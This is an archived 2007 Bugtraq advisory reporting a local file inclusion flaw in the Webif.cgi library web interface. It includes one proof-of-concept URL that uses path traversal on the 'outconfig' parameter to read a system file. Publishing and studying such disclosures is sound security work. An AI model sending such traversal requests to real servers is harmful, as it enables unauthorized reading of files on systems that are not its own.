lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20070618141055.5287.qmail@securityfocus.com>
Date: 18 Jun 2007 14:10:55 -0000
From: maiosyet@...k.org
To: bugtraq@...urityfocus.com
Subject: Webif.cgi local file inclusion

.:: WEBIF.CGI LOCALE FILE INCLUSION ::.

[#] AUTHOR: maiosyet
[#] CONTACT: maiosyet@...k.org
[#] SITE: http://www.mawk.org

[#] ORIGINAL ADV:
http://www.mawk.org/mods.php?mods=Core&page=view&id=102

[#] SOFTWARE: Webif.cgi
http://www.ifnet.it/webif/

[#] DESCRIPTION:
Webif is the natural solution for librarianships who want visibility across 
the web or would like to manage Intranet networks, the whole at a reasonable price.

[#] BUG:
Input passed to the "outconfig" parameter in webif.cgi is not properly verified.
This can be exploited to include arbitrary files from local resources.

[#] PoC:
http://www.site.org/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue

[#] Thanks: 
Einyx; Anathema, Hidden, XVII, Shatsar, Kaisentlaia and all the mawkers; black_dhalya :*
Federico, Eveline (you know who you are).

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ